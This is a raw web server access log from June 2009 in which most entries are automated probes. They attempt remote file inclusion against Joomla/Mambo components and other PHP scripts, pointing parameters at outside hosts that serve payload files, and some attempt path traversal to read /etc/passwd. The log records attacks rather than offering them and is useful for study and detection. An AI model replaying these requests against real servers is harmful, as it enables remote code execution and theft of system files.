151.1.154.24 - - [15/Jun/2009:01:56:21 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
151.1.154.24 - - [15/Jun/2009:01:56:21 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:01:56:35 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:01:56:40 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
95.154.216.25 - - [15/Jun/2009:01:56:50 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
200.54.154.10 - - [15/Jun/2009:01:57:59 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.71.168.180 - - [15/Jun/2009:01:58:32 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.168.180 - - [15/Jun/2009:01:58:32 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.54.154.10 - - [15/Jun/2009:01:58:38 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.71.168.180 - - [15/Jun/2009:01:58:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.168.180 - - [15/Jun/2009:01:58:40 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [15/Jun/2009:01:59:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.54.28.163 - - [15/Jun/2009:01:59:25 -0400] "GET /logs/access_log.Q109052200//component/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.34.167.192 - - [15/Jun/2009:01:59:31 -0400] "GET /logs/error_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
193.34.167.192 - - [15/Jun/2009:01:59:31 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
193.34.167.192 - - [15/Jun/2009:01:59:31 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://glassmac.com/bbs/data/roscanid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
70.38.54.140 - - [15/Jun/2009:01:59:36 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
190.54.28.163 - - [15/Jun/2009:02:00:06 -0400] "GET /logs/access_log.Q109052200//component/option,com_virtuemart/Itemid,7/category_id,7/page,shop.browse//com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idnews.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:02:00:14 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:00:33 -0400] "GET //admin/classes/errors.php?error=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:00:33 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:00:33 -0400] "GET /logs//admin/classes/errors.php?error=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:02:01:51 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
193.34.167.192 - - [15/Jun/2009:02:01:53 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://glassmac.com/bbs/data/roscanid.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
216.55.183.191 - - [15/Jun/2009:02:01:56 -0400] "GET /logs/access_log.Q109060100////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:02:01:56 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5579 "-" "Mozilla/5.0"
64.72.127.30 - - [15/Jun/2009:02:02:01 -0400] "GET ///components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 226 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
64.72.127.30 - - [15/Jun/2009:02:02:01 -0400] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 231 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
64.72.127.30 - - [15/Jun/2009:02:02:01 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
64.72.127.30 - - [15/Jun/2009:02:02:01 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
216.55.183.191 - - [15/Jun/2009:02:02:59 -0400] "GET /logs/access_log.Q109052900////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:02:03:17 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:02:03:17 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:02:03:17 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
151.1.154.24 - - [15/Jun/2009:02:03:52 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
209.59.12.99 - - [15/Jun/2009:02:04:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.92.50 - - [15/Jun/2009:02:04:37 -0400] "GET ///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [15/Jun/2009:02:04:37 -0400] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../etc/passwd HTTP/1.0" 404 265 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [15/Jun/2009:02:04:37 -0400] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 259 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [15/Jun/2009:02:04:37 -0400] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 264 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
67.228.247.118 - - [15/Jun/2009:02:04:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.10) Gecko/20071201 Firefox/2.0.0.10"
67.228.247.118 - - [15/Jun/2009:02:04:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.10) Gecko/20071201 Firefox/2.0.0.10"
67.228.247.118 - - [15/Jun/2009:02:04:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.10) Gecko/20071201 Firefox/2.0.0.10"
67.228.247.118 - - [15/Jun/2009:02:04:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1.10) Gecko/20071201 Firefox/2.0.0.10"
87.230.22.39 - - [15/Jun/2009:02:05:14 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:02:05:36 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
74.6.17.151 - - [15/Jun/2009:02:05:47 -0400] "GET /logs/access_log.Q109052000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.54.140 - - [15/Jun/2009:02:05:54 -0400] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:54 -0400] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:54 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:55 -0400] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:55 -0400] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:55 -0400] "GET /logs/access_log.Q108052700%20%20/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:58 -0400] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:58 -0400] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:58 -0400] "GET /logs/access_log.Q108052700%20%20/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:58 -0400] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:58 -0400] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:58 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:05:59 -0400] "GET /logs/access_log.Q109052900%20%20/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:03 -0400] "GET /logs/access_log.Q109052900%20%20/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:03 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:05 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jun/2009:02:06:29 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
70.38.54.140 - - [15/Jun/2009:02:06:50 -0400] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:50 -0400] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:50 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:50 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:57 -0400] "GET /logs/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:57 -0400] "GET /errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:57 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.54.140 - - [15/Jun/2009:02:06:57 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.6.17.151 - - [15/Jun/2009:02:08:18 -0400] "GET /logs/access_log.Q107080900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.23.158.226 - - [15/Jun/2009:02:08:43 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:02:08:43 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:02:08:43 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:02:08:43 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:02:08:43 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
65.23.158.226 - - [15/Jun/2009:02:08:43 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
217.70.32.2 - - [15/Jun/2009:02:08:48 -0400] "GET /logs/access_log.Q109060100////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:02:08:48 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:02:08:48 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5579 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:02:08:52 -0400] "GET /logs/access_log.Q109052400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
87.230.22.39 - - [15/Jun/2009:02:08:52 -0400] "GET /logs/access_log.Q109052600/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:02:09:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.177.9.20 - - [15/Jun/2009:02:09:44 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
81.177.9.20 - - [15/Jun/2009:02:09:44 -0400] "GET /logs/access_log.Q109060100////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.177.9.20 - - [15/Jun/2009:02:09:44 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5579 "-" "Mozilla/5.0"
81.177.9.20 - - [15/Jun/2009:02:09:45 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 5579 "-" "Mozilla/5.0"
81.177.9.20 - - [15/Jun/2009:02:09:45 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
81.177.9.20 - - [15/Jun/2009:02:09:45 -0400] "GET /logs/access_log.Q109060100////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:02:09:56 -0400] "GET /logs/access_log.Q109052900////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.4 - - [15/Jun/2009:02:10:17 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.246.20.221 - - [15/Jun/2009:02:10:31 -0400] "GET /logs/access_log.Q109060300//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:02:10:31 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:02:10:31 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
62.173.171.118 - - [15/Jun/2009:02:10:51 -0400] "GET /logs/access_log.Q109052200%20%20//admin/classes/errors.php?error=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [15/Jun/2009:02:11:26 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [15/Jun/2009:02:11:57 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
79.174.72.67 - - [15/Jun/2009:02:12:22 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://phetchabun2.net/banner.jpg?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
81.177.9.20 - - [15/Jun/2009:02:12:26 -0400] "GET /logs/access_log.Q109052900////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.177.9.20 - - [15/Jun/2009:02:12:28 -0400] "GET /logs/access_log.Q109052900////?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.151.224.238 - - [15/Jun/2009:02:13:02 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 260 "-" "libwww-perl/5.820"
209.151.224.238 - - [15/Jun/2009:02:13:02 -0400] "GET /logs/access_log.Q109051700//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
209.151.224.238 - - [15/Jun/2009:02:13:02 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.820"
209.151.224.238 - - [15/Jun/2009:02:13:07 -0400] "GET /logs/access_log.Q109052900//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
82.146.39.200 - - [15/Jun/2009:02:13:47 -0400] "GET /logs/access_log.Q109053100/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.822"
82.146.39.200 - - [15/Jun/2009:02:13:47 -0400] "GET /spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.822"
82.146.39.200 - - [15/Jun/2009:02:13:47 -0400] "GET /logs/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.822"
209.59.12.99 - - [15/Jun/2009:02:14:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.22.39 - - [15/Jun/2009:02:14:15 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:02:15:21 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
82.146.39.200 - - [15/Jun/2009:02:15:27 -0400] "GET /logs/access_log.Q109052100/spaw_control.class.php?spaw_root=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.822"
62.173.171.118 - - [15/Jun/2009:02:16:26 -0400] "GET /logs/access_log.Q109052900//admin/classes/errors.php?error=http://aglifestylesmarketplace.com/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:16:32 -0400] "GET //login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:16:32 -0400] "GET /logs//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:16:32 -0400] "GET /logs/access_log.Q109050300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [15/Jun/2009:02:16:43 -0400] "GET /logs/access_log.Q109060300%20%20//login.php?dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
